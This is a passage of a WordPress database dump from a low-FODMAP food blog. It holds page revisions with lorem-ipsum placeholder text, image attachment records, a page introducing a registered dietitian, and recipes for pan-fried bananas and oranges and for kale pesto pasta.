\r\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','Working with a dietitian','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','inherit','closed','closed','','875-revision-v1','','','2020-04-12 07:58:36','2020-04-12 07:58:36','',875,'http://tummyrevolution.com/875-revision-v1/',0,'revision','',0),(5037,1,'2020-04-12 08:33:16','2020-04-12 08:33:16','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\r\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\r\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','Yoga for a troubling Tummy','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','inherit','closed','closed','','910-revision-v1','','','2020-04-12 08:33:16','2020-04-12 08:33:16','',910,'http://tummyrevolution.com/910-revision-v1/',0,'revision','',0),(5038,1,'2020-04-12 08:34:01','2020-04-12 08:34:01','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\r\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\r\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][/vc_column][/vc_row]','What is the low FODMAP diet','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','inherit','closed','closed','','902-revision-v1','','','2020-04-12 08:34:01','2020-04-12 08:34:01','',902,'http://tummyrevolution.com/902-revision-v1/',0,'revision','',0),(5040,1,'2020-04-12 09:34:56','2020-04-12 09:34:56','','working-with-dietitian-2','','inherit','open','closed','','working-with-dietitian-2-2','','','2020-04-12 09:34:56','2020-04-12 09:34:56','',4890,'http://tummyrevolution.com/wp-content/uploads/2020/04/working-with-dietitian-2.jpg',0,'attachment','image/jpeg',0),(5041,1,'2020-04-12 09:37:05','2020-04-12 09:37:05','\n
\"\"
\n\n\n\n

Because the low-FODMAP diet is a medical diet it is always recommend that you work with a  FODMAP trained dietitian if you decide to follow the low FODMAP diet. A trained dietitian can work together with you to develop a specific plan tailored around your individual needs. 

\n\n\n\n

I work closely together with Debra Thomas who is a Registered Dietitian with the Health Care Professions Council, a member of the British Dietetic Association and a listed member of the BDA’s Freelance Dietitians Group.

\n\n\n\n

As a Nutrition Consultant and Advanced Practitioner, she has over 18 years’ experience of advising on a range of therapeutic diets, but her specialism is the treatment of irritable bowel syndrome (IBS). She has been certified by King’s College London, to deliver tailor-made advice on the low FODMAP diet as an effective treatment for IBS. She\'s worked for many years in the NHS in the UK and she\'s also the founder of FODMAP Consultancy. For more information about Debra and FODMAP Consultancy visit her website  https://www.fodmapconsultancy.com

\n','Working with a Dietitian','','inherit','closed','closed','','4890-revision-v1','','','2020-04-12 09:37:05','2020-04-12 09:37:05','',4890,'http://tummyrevolution.com/4890-revision-v1/',0,'revision','',0),(5042,1,'2020-04-12 09:48:27','2020-04-12 09:48:27','','Debra-Shine-on.','','inherit','open','closed','','debra-shine-on','','','2020-04-12 09:48:27','2020-04-12 09:48:27','',4890,'http://tummyrevolution.com/wp-content/uploads/2020/04/Debra-Shine-on..jpg',0,'attachment','image/jpeg',0),(5043,1,'2020-04-12 09:48:49','2020-04-12 09:48:49','\n
\"\"
\n\n\n\n

Because the low-FODMAP diet is a medical diet it is always recommend that you work with a  FODMAP trained dietitian if you decide to follow the low FODMAP diet. A trained dietitian can work together with you to develop a specific plan tailored around your individual needs. 

\n\n\n\n

I work closely together with Debra Thomas who is a Registered Dietitian with the Health Care Professions Council, a member of the British Dietetic Association and a listed member of the BDA’s Freelance Dietitians Group.

\n\n\n\n

As a Nutrition Consultant and Advanced Practitioner, she has over 18 years’ experience of advising on a range of therapeutic diets, but her specialism is the treatment of irritable bowel syndrome (IBS). She has been certified by King’s College London, to deliver tailor-made advice on the low FODMAP diet as an effective treatment for IBS. She\'s worked for many years in the NHS in the UK and she\'s also the founder of FODMAP Consultancy. For more information about Debra and FODMAP Consultancy visit her website  https://www.fodmapconsultancy.com

\n\n\n\n\n','Working with a Dietitian','','inherit','closed','closed','','4890-revision-v1','','','2020-04-12 09:48:49','2020-04-12 09:48:49','',4890,'http://tummyrevolution.com/4890-revision-v1/',0,'revision','',0),(5044,1,'2020-04-12 09:50:10','2020-04-12 09:50:10','','Debra-Shine-on.-2','','inherit','open','closed','','debra-shine-on-2','','','2020-04-12 09:50:10','2020-04-12 09:50:10','',4890,'http://tummyrevolution.com/wp-content/uploads/2020/04/Debra-Shine-on.-2.jpg',0,'attachment','image/jpeg',0),(5045,1,'2020-04-12 09:50:23','2020-04-12 09:50:23','\n
\"\"
\n\n\n\n

Because the low-FODMAP diet is a medical diet it is always recommend that you work with a  FODMAP trained dietitian if you decide to follow the low FODMAP diet. A trained dietitian can work together with you to develop a specific plan tailored around your individual needs. 

\n\n\n\n

I work closely together with Debra Thomas who is a Registered Dietitian with the Health Care Professions Council, a member of the British Dietetic Association and a listed member of the BDA’s Freelance Dietitians Group.

\n\n\n\n

As a Nutrition Consultant and Advanced Practitioner, she has over 18 years’ experience of advising on a range of therapeutic diets, but her specialism is the treatment of irritable bowel syndrome (IBS). She has been certified by King’s College London, to deliver tailor-made advice on the low FODMAP diet as an effective treatment for IBS. She\'s worked for many years in the NHS in the UK and she\'s also the founder of FODMAP Consultancy. For more information about Debra and FODMAP Consultancy visit her website  https://www.fodmapconsultancy.com

\n\n\n\n\n','Working with a Dietitian','','inherit','closed','closed','','4890-revision-v1','','','2020-04-12 09:50:23','2020-04-12 09:50:23','',4890,'http://tummyrevolution.com/4890-revision-v1/',0,'revision','',0),(5046,1,'2020-04-12 12:23:55','2020-04-12 12:23:55','','twitter-icon','','inherit','open','closed','','twitter-icon','','','2020-04-12 12:23:55','2020-04-12 12:23:55','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/twitter-icon.png',0,'attachment','image/png',0),(5047,1,'2020-04-12 12:25:02','2020-04-12 12:25:02','','Pinterest-icon','','inherit','open','closed','','pinterest-icon','','','2020-04-12 12:25:02','2020-04-12 12:25:02','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Pinterest-icon.png',0,'attachment','image/png',0),(5048,1,'2020-04-12 12:30:00','2020-04-12 12:30:00','','linked-in-icon','','inherit','open','closed','','linked-in-icon','','','2020-04-12 12:30:00','2020-04-12 12:30:00','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/linked-in-icon.png',0,'attachment','image/png',0),(5049,1,'2020-04-12 12:30:54','2020-04-12 12:30:54','','facebook-icon','','inherit','open','closed','','facebook-icon','','','2020-04-12 12:30:54','2020-04-12 12:30:54','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/facebook-icon.png',0,'attachment','image/png',0),(5050,1,'2020-04-12 12:37:25','2020-04-12 12:37:25','','facebook-icon-small','','inherit','open','closed','','facebook-icon-small','','','2020-04-12 12:37:25','2020-04-12 12:37:25','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/facebook-icon-small.png',0,'attachment','image/png',0),(5051,1,'2020-04-12 12:37:26','2020-04-12 12:37:26','','linked-in-iconsmall','','inherit','open','closed','','linked-in-iconsmall','','','2020-04-12 12:37:26','2020-04-12 12:37:26','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/linked-in-iconsmall.png',0,'attachment','image/png',0),(5052,1,'2020-04-12 12:37:26','2020-04-12 12:37:26','','twitter-iconsmall','','inherit','open','closed','','twitter-iconsmall','','','2020-04-12 12:37:26','2020-04-12 12:37:26','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/twitter-iconsmall.png',0,'attachment','image/png',0),(5053,1,'2020-04-12 12:40:56','2020-04-12 12:40:56','','Pinterest-iconsmall','','inherit','open','closed','','pinterest-iconsmall','','','2020-04-12 12:40:56','2020-04-12 12:40:56','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Pinterest-iconsmall.png',0,'attachment','image/png',0),(5054,1,'2020-04-12 16:51:31','2020-04-12 16:51:31','\n

I\'m a huge fan of fruit and happily eat most fruits as they come. Sometimes it\'s nice to do something a bit more special with fruit though and this recipe is definitely special. Panfried bananas and oranges lightly coated with cinnamon and maple syrup mmmm..., then top it off with some whipped coconut or vanilla cream - amazing!

If you have a troubling tummy like me some fruits are better to eat than others. Bananas and oranges and both on the good list - yesss! so this recipe works well for troubling tumms. What I like with this recipe is the combination of the cinnamon flavoured banana mixed with the citrus flavour of the orange and then topped off with some coconutty cream (or vanilla if you choose that option). It is just such nice mix of flavours and I love the way it looks on the plate too - perfect for a dinner party.

You do want to eat this dessert warm though as it is not half as good cold - believe me, I\'ve tried it.
Luckily it\'s very easy to make so it will not take you long to get it ready.

If you\'ve not made whipped coconut cream, don\'t worry, It\'s very easy to make and if you make some extra you can store it in your fridge and have with other fruits and berries.

\n\n\n\n
\"\"
\n\n\n\n

INGREDIENTS

2 oranges

\n\n\n\n

2 ripe, but firm bananas, sliced

\n\n\n\n

1 tbsp butter or coconut oil

\n\n\n\n

1 tsp pure maple syrum

\n\n\n\n

1/8 tsp cinnamon

\n\n\n\n

1/8 tsp vanilla extract

\n\n\n\n

pinch of sea salt

\n\n\n\n

Coconut Cream:

\n\n\n\n

1 can full fat coconut milk or cream

\n\n\n\n

1 tsp grated orange zest (optional)

\n\n\n\n

Toppings:

\n\n\n\n

Unsweetened coconut flakes

\n\n\n\n

Chopped Macadamia nuts

\n\n\n\n

INSTRUCTIONS

\n\n\n\n

Over medium heat, melt the butter and maple syrup in a frying pan. Add cinnamon, salt and vanilla extract, and stir to combine.

\n\n\n\n

Place the sliced in half bananas in the pan and cook on medium heat for 2-4 minutes each side. Be sure to watch bananas as they caramelize to ensure they don’t brown.

\n\n\n\n

Remove the bananas from the pan and add the sliced in half oranges. Cook for 2-3 minutes over medium heat.

\n\n\n\n

Take the pan off the heat and remove the oranges.

\n\n\n\n

While bananas and oranges are cooling, open your coconut cream. Gently pour out the coconut water that is separated and sitting on top of the coconut cream into a separate bowl.

\n\n\n\n

Place the thick cream that remains in a mixing bowl and whip until peaks form (about 2-3 minutes on high if using a mixer), then stir in some orange zest.

You can also use normal whipping cream. I then add some vanilla extract and orange zest.

\n\n\n\n

Place out your oranges on plates and lace one banana slice on each orange. Top them off with coconut cream, chopped macadamia nuts, and coconut flakes.

\n\n\n\n
\"\"
\n','Pan-fried bananas & oranges with coconut cream','','publish','open','open','','pan-fried-bananas-oranges-with-coconut-cream','','','2020-10-27 14:47:18','2020-10-27 14:47:18','',0,'http://tummyrevolution.com/?p=5054',0,'post','',0),(5055,1,'2020-04-12 16:49:54','2020-04-12 16:49:54','','orange-landscape-small','','inherit','open','closed','','orange-landscape-small','','','2020-04-12 16:49:54','2020-04-12 16:49:54','',5054,'http://tummyrevolution.com/wp-content/uploads/2020/04/orange-landscape-small.jpg',0,'attachment','image/jpeg',0),(5056,1,'2020-04-12 16:51:05','2020-04-12 16:51:05','','banana-orange-Noah-small','','inherit','open','closed','','banana-orange-noah-small','','','2020-04-12 16:51:05','2020-04-12 16:51:05','',5054,'http://tummyrevolution.com/wp-content/uploads/2020/04/banana-orange-Noah-small.jpg',0,'attachment','image/jpeg',0),(5057,1,'2020-04-12 16:51:31','2020-04-12 16:51:31','\n

I\'m a huge fan of fruit and happily eat most fruits as they come. Sometimes it\'s nice to do something a bit more special with fruit though and this recipe is definitely special. Panfried bananas and oranges lightly coated with cinnamon and maple syrup mmmm..., then top it off with some whipped coconut or vanilla cream - amazing!

If you have a troubling tummy like me some fruits are better to eat than others. Bananas and oranges and both on the good list - yesss! so this recipe works well for troubling tumms. What I like with this recipe is the combination of the cinnamon flavoured banana mixed with the citrus flavour of the orange and then topped off with some coconutty cream (or vanilla if you choose that option). It is just such nice mix of flavours and I love the way it looks on the plate too - perfect for a dinner party.

You do want to eat this dessert warm though as it is not half as good cold - believe me, I\'ve tried it.
Luckily it\'s very easy to make so it will not take you long to get it ready.

If you\'ve not made whipped coconut cream, don\'t worry, It\'s very easy to make and if you make some extra you can store it in your fridge and have with other fruits and berries.

\n\n\n\n
\"\"
\n\n\n\n

Ingredients

2 oranges

\n\n\n\n

2 ripe, but firm bananas, sliced

\n\n\n\n

1 tbsp butter or coconut oil

\n\n\n\n

1 tsp pure maple syrum

\n\n\n\n

1/8 tsp cinnamon

\n\n\n\n

1/8 tsp vanilla extract

\n\n\n\n

pinch of sea salt

\n\n\n\n

Coconut Cream:

\n\n\n\n

1 can full fat coconut milk or cream

\n\n\n\n

1 tsp grated orange zest (optional)

\n\n\n\n

Toppings:

\n\n\n\n

Unsweetened coconut flakes

\n\n\n\n

Chopped Macadamia nuts

\n\n\n\n

Instructions

\n\n\n\n

Over medium heat, melt the butter and maple syrup in a frying pan. Add cinnamon, salt and vanilla extract, and stir to combine.

\n\n\n\n

Place the sliced in half bananas in the pan and cook on medium heat for 2-4 minutes each side. Be sure to watch bananas as they caramelize to ensure they don’t brown.

\n\n\n\n

Remove the bananas from the pan and add the sliced in half oranges. Cook for 2-3 minutes over medium heat.

\n\n\n\n

Take the pan off the heat and remove the oranges.

\n\n\n\n

While bananas and oranges are cooling, open your coconut cream. Gently pour out the coconut water that is separated and sitting on top of the coconut cream into a separate bowl.

\n\n\n\n

Place the thick cream that remains in a mixing bowl and whip until peaks form (about 2-3 minutes on high if using a mixer), then stir in some orange zest.

You can also use normal whipping cream. I then add some vanilla extract and orange zest.

\n\n\n\n

Place out your oranges on plates and lace one banana slice on each orange. Top them off with coconut cream, chopped macadamia nuts, and coconut flakes.

\n\n\n\n
\"\"
\n','PAN-FRIED BANANAS & ORANGES WITH COCONUT CREAM','','inherit','closed','closed','','5054-revision-v1','','','2020-04-12 16:51:31','2020-04-12 16:51:31','',5054,'http://tummyrevolution.com/5054-revision-v1/',0,'revision','',0),(5058,1,'2020-04-12 16:52:19','2020-04-12 16:52:19','\n

I\'m a huge fan of fruit and happily eat most fruits as they come. Sometimes it\'s nice to do something a bit more special with fruit though and this recipe is definitely special. Panfried bananas and oranges lightly coated with cinnamon and maple syrup mmmm..., then top it off with some whipped coconut or vanilla cream - amazing!

If you have a troubling tummy like me some fruits are better to eat than others. Bananas and oranges and both on the good list - yesss! so this recipe works well for troubling tumms. What I like with this recipe is the combination of the cinnamon flavoured banana mixed with the citrus flavour of the orange and then topped off with some coconutty cream (or vanilla if you choose that option). It is just such nice mix of flavours and I love the way it looks on the plate too - perfect for a dinner party.

You do want to eat this dessert warm though as it is not half as good cold - believe me, I\'ve tried it.
Luckily it\'s very easy to make so it will not take you long to get it ready.

If you\'ve not made whipped coconut cream, don\'t worry, It\'s very easy to make and if you make some extra you can store it in your fridge and have with other fruits and berries.

\n\n\n\n
\"\"
\n\n\n\n

INGREDIENTS

2 oranges

\n\n\n\n

2 ripe, but firm bananas, sliced

\n\n\n\n

1 tbsp butter or coconut oil

\n\n\n\n

1 tsp pure maple syrum

\n\n\n\n

1/8 tsp cinnamon

\n\n\n\n

1/8 tsp vanilla extract

\n\n\n\n

pinch of sea salt

\n\n\n\n

Coconut Cream:

\n\n\n\n

1 can full fat coconut milk or cream

\n\n\n\n

1 tsp grated orange zest (optional)

\n\n\n\n

Toppings:

\n\n\n\n

Unsweetened coconut flakes

\n\n\n\n

Chopped Macadamia nuts

\n\n\n\n

INSTRUCTIONS

\n\n\n\n

Over medium heat, melt the butter and maple syrup in a frying pan. Add cinnamon, salt and vanilla extract, and stir to combine.

\n\n\n\n

Place the sliced in half bananas in the pan and cook on medium heat for 2-4 minutes each side. Be sure to watch bananas as they caramelize to ensure they don’t brown.

\n\n\n\n

Remove the bananas from the pan and add the sliced in half oranges. Cook for 2-3 minutes over medium heat.

\n\n\n\n

Take the pan off the heat and remove the oranges.

\n\n\n\n

While bananas and oranges are cooling, open your coconut cream. Gently pour out the coconut water that is separated and sitting on top of the coconut cream into a separate bowl.

\n\n\n\n

Place the thick cream that remains in a mixing bowl and whip until peaks form (about 2-3 minutes on high if using a mixer), then stir in some orange zest.

You can also use normal whipping cream. I then add some vanilla extract and orange zest.

\n\n\n\n

Place out your oranges on plates and lace one banana slice on each orange. Top them off with coconut cream, chopped macadamia nuts, and coconut flakes.

\n\n\n\n
\"\"
\n','PAN-FRIED BANANAS & ORANGES WITH COCONUT CREAM','','inherit','closed','closed','','5054-revision-v1','','','2020-04-12 16:52:19','2020-04-12 16:52:19','',5054,'http://tummyrevolution.com/5054-revision-v1/',0,'revision','',0),(5059,1,'2020-04-12 17:11:34','2020-04-12 17:11:34','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"2px\"][vc_column_text]\r\n
Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam. Utamur conclusionemque id mel, et eum etiam honestatis. Eum diam sale paulo ex. Veniam laudem vis ex, te phaedrum
\r\n[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"3936,3937\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch*%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20of%20water%22%7D%5D\" ingredients_3=\"%5B%5D\" recipe_name=\"Figs Smoothie\" image=\"724\" prep_time=\"40 Minutes\" cook_time=\"25 Minutes\" name_1=\"Crust\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\r\n\r\n**You can use tapioca or cornstarch instead.\r\n\r\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Caramelized apples\"][/vc_column][/vc_row]','ORANGE TEA','Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.','inherit','closed','closed','','2142-revision-v1','','','2020-04-12 17:11:34','2020-04-12 17:11:34','',2142,'http://tummyrevolution.com/2142-revision-v1/',0,'revision','',0),(5060,1,'2020-04-12 18:33:39','2020-04-12 18:33:39','\n

\n\n\n\n

Pasta and pesto is a healthy quick meals that’s perfect for busy days in the week when you’re short of time. Made with kale, this version boasts great flavour. Kale is also a nutrient dense food full of antioxidants, vitamins and minerals.

\n\n\n\n
\"\"
\n\n\n\n

Makes 1-2 Serving

\n\n\n\n

INGREDIENTS

\n\n\n\n

2 cups (200g) gluten free spaghetti, gluten free pasta of choice or courgetti

\n\n\n\n

1/3 cup (85g) pine nuts, toasted
(Alternatively you can swap the pine nuts for walnuts)

\n\n\n\n

2 cups (85g) kale

\n\n\n\n

2/3 cup (85g) Parmesan (grated) and a little more for serving

\n\n\n\n

1/3 cup (75ml) extra virgin olive oil

\n\n\n\n

1/3 cup (75ml) garlic infused olive oil

\n\n\n\n

Juice of ½ lemon

\n\n\n\n

INSTRUCTIONS

\n\n\n\n

1. Bring a large pan of water to boil over high heat. Add the pasta and cook according to package instructions until \'al dente\'.

\n\n\n\n

2. Whilst the pasta is cooking, add the pine nuts or walnuts to a frying pan (no oil needed) and toast on medium heat for a few minutes until golden brown. Put a few pine nuts or walnuts aside for garnish when serving.  

\n\n\n\n

2. Put the rest of the pine nuts, Parmesan, garlic, oils, kale and lemon juice in a food processor and whizz to a smooth paste.

\n\n\n\n

4. Drain the pasta and place in a serving dish. 

\n\n\n\n

3. Stir 2-3 tablespoons of pesto through the pasta and top it with the remaining pine nuts or walnuts and some Parmesan. 

\n\n\n\n

4. Put the remaining pesto in an airtight container or jar adding a little bit of extra olive oil to cover the surface. It will keep in the fridge for up to a week or you can freeze it for up to a month.

\n\n\n\n
\"\"
\n','Pasta and courgetti with super kale pesto','','publish','open','open','','pasta-with-super-kale-pesto','','','2020-04-19 06:29:37','2020-04-19 06:29:37','',0,'http://tummyrevolution.com/?p=5060',0,'post','',0),(5061,1,'2020-04-12 18:11:13','2020-04-12 18:11:13','','pesto-pasta-small','','inherit','open','closed','','pesto-pasta-small','','','2020-04-12 18:11:13','2020-04-12 18:11:13','',5060,'http://tummyrevolution.com/wp-content/uploads/2020/04/pesto-pasta-small.jpg',0,'attachment','image/jpeg',0),(5062,1,'2020-04-12 18:21:33','2020-04-12 18:21:33','','MG_2185','','inherit','open','closed','','mg_2185','','','2020-04-12 18:21:33','2020-04-12 18:21:33','',5060,'http://tummyrevolution.com/wp-content/uploads/2020/04/MG_2185.jpg',0,'attachment','image/jpeg',0),(5063,1,'2020-04-12 18:33:18','2020-04-12 18:33:18','','Kale-pesto-2small','','inherit','open','closed','','kale-pesto-2small','','','2020-04-12 18:33:18','2020-04-12 18:33:18','',5060,'http://tummyrevolution.com/wp-content/uploads/2020/04/Kale-pesto-2small.jpg',0,'attachment','image/jpeg',0),(5064,1,'2020-04-12 18:33:39','2020-04-12 18:33:39','\n

Pasta and pesto is a healthy quick meals that’s perfect for busy days in the week when you’re short of time. Made with kale, this version boasts great flavour. Kale is also a nutrient dense food full of antioxidants, vitamins and minerals.

\n\n\n\n
\"\"
\n\n\n\n

Makes 1-2 Serving

\n\n\n\n

INGREDIENTS

\n\n\n\n

2 cups (200g) gluten free spaghetti, gluten free pasta of choice or courgetti

\n\n\n\n

1/3 cup (85g) pine nuts, toasted
(Alternatively you can swap the pine nuts for walnuts)

\n\n\n\n

2 cups (85g) kale

\n\n\n\n

2/3 cup (85g) Parmesan (grated) and a little more for serving

\n\n\n\n

1/3 cup (75ml) extra virgin olive oil

\n\n\n\n

1/3 cup (75ml) garlic infused olive oil

\n\n\n\n

Juice of ½ lemon

\n\n\n\n

INSTRUCTIONS

\n\n\n\n

1. Bring a large pan of water to boil over high heat. Add the pasta and cook according to package instructions until \'al dente\'.

\n\n\n\n

2. Whilst the pasta is cooking, add the pine nuts or walnuts to a frying pan (no oil needed) and toast on medium heat for a few minutes until golden brown. Put a few pine nuts or walnuts aside for garnish when serving.  

\n\n\n\n

2. Put the rest of the pine nuts, Parmesan, garlic, oils, kale and lemon juice in a food processor and whizz to a smooth paste.

\n\n\n\n

4. Drain the pasta and place in a serving dish. 

\n\n\n\n

3. Stir 2-3 tablespoons of pesto through the pasta and top it with the remaining pine nuts or walnuts and some Parmesan. 

\n\n\n\n

4. Put the remaining pesto in an airtight container or jar adding a little bit of extra olive oil to cover the surface. It will keep in the fridge for up to a week or you can freeze it for up to a month.

\n\n\n\n
\"\"
